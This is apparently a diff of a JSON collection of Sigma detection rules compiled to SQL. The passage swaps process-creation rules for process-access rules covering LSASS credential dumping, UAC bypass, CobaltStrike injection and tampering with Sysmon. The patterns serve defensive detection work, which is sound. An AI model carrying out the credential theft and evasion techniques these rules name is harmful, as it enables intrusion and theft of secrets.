ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\safari.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqlagent.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqlserver.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\')) AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR (CommandLine LIKE '%/c powershell%' ESCAPE '\\' OR CommandLine LIKE '%/c pwsh%' ESCAPE '\\') OR Description = 'Windows PowerShell' OR Product = 'PowerShell Core 6' OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')))" + "SELECT * FROM logs WHERE (CallTrace LIKE 'UNKNOWN%' ESCAPE '\\' AND NOT ((TargetImage LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceUI.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\' AND SourceImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\systeminfo.exe' ESCAPE '\\' AND SourceImage LIKE '%setup64.exe' ESCAPE '\\') OR (TargetImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\' AND SourceImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Discord\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Discord.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\AUDIODG.EXE' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND GrantedAccess = '0x1000') OR (Provider_Name = 'Microsoft-Windows-Kernel-Audit-API-Calls') OR (TargetImage LIKE '%\\\\Evernote\\\\Evernote.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_susp_parent_process.yml" + "filename": "proc_access_win_direct_syscall_ntopenprocess.yml" }, { - "title": "Disabled Volume Snapshots", - "id": "dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a", + "title": "UAC Bypass Using WOW64 Logger DLL Hijack", + "id": "4f6c43e2-f989-4ea5-bcd8-843b49a0317c", "status": "test", - "description": "Detects commands that temporarily turn off Volume Snapshots", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate administration" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Services\\\\VSS\\\\Diag%' ESCAPE '\\' AND CommandLine LIKE '%/d Disabled%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (SourceImage LIKE '%:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' AND GrantedAccess = '0x1fffff' AND CallTrace LIKE 'UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_volsnap_disable.yml" + "filename": "proc_access_win_uac_bypass_wow64_logger.yml" }, { - "title": "Suspicious Manipulation Of Default Accounts Via Net.EXE", - "id": "5b768e71-86f2-4879-b448-81061cbae951", - "status": "experimental", - "description": "Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "CobaltStrike BOF Injection Pattern", + "id": "09706624-b7f6-455d-9d02-adee024cee1d", + "status": "test", + "description": "Detects a typical pattern of a CobaltStrike BOF which inject into other processes", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.execution", + "attack.t1106", + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND CommandLine LIKE '% user %' ESCAPE '\\' AND (CommandLine LIKE '% Järjestelmänvalvoja %' ESCAPE '\\' OR CommandLine LIKE '% Rendszergazda %' ESCAPE '\\' OR CommandLine LIKE '% Администратор %' ESCAPE '\\' OR CommandLine LIKE '% Administrateur %' ESCAPE '\\' OR CommandLine LIKE '% Administrador %' ESCAPE '\\' OR CommandLine LIKE '% Administratör %' ESCAPE '\\' OR CommandLine LIKE '% Administrator %' ESCAPE '\\' OR CommandLine LIKE '% guest %' ESCAPE '\\' OR CommandLine LIKE '% DefaultAccount %' ESCAPE '\\' OR CommandLine LIKE '% \"Järjestelmänvalvoja\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Rendszergazda\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Администратор\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrateur\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrador\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administratör\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrator\" %' ESCAPE '\\' OR CommandLine LIKE '% \"guest\" %' ESCAPE '\\' OR CommandLine LIKE '% \"DefaultAccount\" %' ESCAPE '\\' OR CommandLine LIKE '% ''Järjestelmänvalvoja'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Rendszergazda'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Администратор'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrateur'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrador'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administratör'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrator'' %' ESCAPE '\\' OR CommandLine LIKE '% ''guest'' %' ESCAPE '\\' OR CommandLine LIKE '% ''DefaultAccount'' %' ESCAPE '\\')) AND NOT (CommandLine LIKE '%guest%' ESCAPE '\\' AND CommandLine LIKE '%/active no%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (CallTrace REGEXP '^C:\\\\Windows\\\\SYSTEM32\\\\ntdll\\.dll\\+[a-z0-9]{4,6}\\|C:\\\\Windows\\\\System32\\\\KERNELBASE\\.dll\\+[a-z0-9]{4,6}\\|UNKNOWN\\([A-Z0-9]{16}\\)$' AND GrantedAccess IN ('0x1028', '0x1fffff'))" ], - "filename": "proc_creation_win_net_default_accounts_manipulation.yml" + "filename": "proc_access_win_cobaltstrike_bof_injection_pattern.yml" }, { - "title": "Base64 MZ Header In CommandLine", - "id": "22e58743-4ac8-4a9f-bf19-00a0428d8c5f", - "status": "experimental", - "description": "Detects encoded base64 MZ header in the commandline", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Load Undocumented Autoelevated COM Interface", + "id": "fb3722e4-1a06-46b6-b772-253e2e7db933", + "status": "test", + "description": "COM interface (EditionUpgradeManager) that is not used by standard executables.", + "author": "oscd.community, Dmitry Uchakin", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR CommandLine LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR CommandLine LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE CallTrace LIKE '%editionupgrademanagerobj.dll%' ESCAPE '\\'" ], - "filename": "proc_creation_win_susp_inline_base64_mz_header.yml" + "filename": "proc_access_win_load_undocumented_autoelevated_com_interface.yml" }, { - "title": "Console CodePage Lookup Via CHCP", - "id": "7090adee-82e2-4269-bd59-80691e7c6338", - "status": "experimental", - "description": "Detects use of chcp to look up the system locale value as part of host discovery", - "author": "_pete_0, TheDFIRReport", + "title": "Credential Dumping by Pypykatz", + "id": "7186e989-4ed7-4f4e-a656-4674b9e3e48b", + "status": "test", + "description": "Detects LSASS process access by pypykatz for credential dumping.", + "author": "Bhabesh Raj", "tags": [ - "attack.discovery", - "attack.t1614.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command." + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% /c %' ESCAPE '\\' OR ParentCommandLine LIKE '% /r %' ESCAPE '\\' OR ParentCommandLine LIKE '% /k %' ESCAPE '\\') AND NewProcessName LIKE '%\\\\chcp.com' ESCAPE '\\' AND (CommandLine LIKE '%chcp' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%libffi-7.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python3%.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" ], - "filename": "proc_creation_win_chcp_codepage_lookup.yml" + "filename": "proc_access_win_pypykatz_cred_dump_lsass_access.yml" }, { - "title": "HackTool - SharpImpersonation Execution", - "id": "f89b08d0-77ad-4728-817b-9b16c5a69c7a", - "status": "experimental", - "description": "Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", - "author": "Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems)", + "title": "LSASS Memory Access by Tool Named Dump", + "id": "9bd012ee-0dff-44d7-84a0-aa698cfd87a3", + "status": "test", + "description": "Detects a possible process memory dump based on a keyword in the file name of the accessing process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1134.001", - "attack.t1134.003" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Rare programs that contain the word dump in their name and access lsass" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpImpersonation.exe' ESCAPE '\\' OR OriginalFileName = 'SharpImpersonation.exe' OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% binary:%' ESCAPE '\\') OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% shellcode:%' ESCAPE '\\') OR (CommandLine LIKE '% technique:CreateProcessAsUserW%' ESCAPE '\\' OR CommandLine LIKE '% technique:ImpersonateLoggedOnuser%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%dump%' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharp_impersonation.yml" + "filename": "proc_access_win_lsass_memdump_indicators.yml" }, { - "title": "Suspicious Rundll32 Activity Invoking Sys File", - "id": "731231b9-0b5d-4219-94dd-abb6959aa7ea", - "status": "test", - "description": "Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452", + "title": "SysmonEnte Usage", + "id": "d29ada0f-af45-4f27-8f32-f7b77c3dbc4e", + "status": "experimental", + "description": "Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND (CommandLine LIKE '%.sys,%' ESCAPE '\\' OR CommandLine LIKE '%.sys %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((TargetImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND GrantedAccess = '0x1400') AND NOT (((SourceImage LIKE 'C:\\\\Program Files%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\'))) OR CallTrace = 'Ente')" ], - "filename": "proc_creation_win_rundll32_sys.yml" + "filename": "proc_access_win_hack_sysmonente.yml" }, { - "title": "TA505 Dropper Load Pattern", - "id": "18cf6cf0-39b0-4c22-9593-e244bdc9a2d4", + "title": "Malware Shellcode in Verclsid Target Process", + "id": "b7967e22-3d7e-409b-9ed5-cdae3f9243a1", "status": "test", - "description": "Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro", + "author": "John Lambert (tech), Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.g0092", - "attack.t1106" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'mshta.exe'))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\verclsid.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF') AND ((CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%VBE7.DLL%' ESCAPE '\\') OR (SourceImage LIKE '%\\\\Microsoft Office\\\\%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_ta505_dropper.yml" + "filename": "proc_access_win_malware_verclsid_shellcode.yml" }, { - "title": "Renamed Whoami Execution", - "id": "f1086bf7-a0c4-4a37-9102-01e573caf4a0", - "status": "test", - "description": "Detects the execution of whoami that has been renamed to a different name to avoid detection", + "title": "Suspicious GrantedAccess Flags on LSASS Access", + "id": "a18dd26b-6450-46de-8c91-9659150cf088", + "status": "experimental", + "description": "Detects process access to LSASS memory with suspicious access flags", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Legitimate software such as AV and EDR" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'whoami.exe' AND NOT (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Users\\\\%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\perfmon.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\MRT.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND SourceImage LIKE '%Antivirus%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\MMSSHost\\\\MMSSHOST.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\') AND GrantedAccess = '0x1fffff')))" ], - "filename": "proc_creation_win_renamed_whoami.yml" + "filename": "proc_access_win_susp_proc_access_lsass.yml" }, { - "title": "UAC Bypass via ICMLuaUtil", - "id": "49f2f17b-b4c8-4172-a68b-d5bf95d05130", + "title": "Potential Svchost Memory Access", + "id": "166e9c50-8cd9-44af-815d-d1f0c0e90dde", "status": "experimental", - "description": "Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service.", + "author": "Tim Burrell", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '%/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '%/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe'))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND (CallTrace LIKE '%Microsoft.Build.ni.dll%' ESCAPE '\\' OR CallTrace LIKE '%System.ni.dll%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_uac_bypass_icmluautil.yml" + "filename": "proc_access_win_invoke_phantom.yml" }, { - "title": "Suspicious Service Path Modification", - "id": "138d3531-8793-4f50-a2cd-f291b2863d78", - "status": "test", - "description": "Detects service path modification via the \"sc\" binary to a suspicious command or path", - "author": "Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "LSASS Memory Dump", + "id": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", + "status": "experimental", + "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", + "author": "Samir Bousseaden, Michael Haag", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unlikely" + "False positives are present when looking for 0x1410. Exclusions may be required." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE 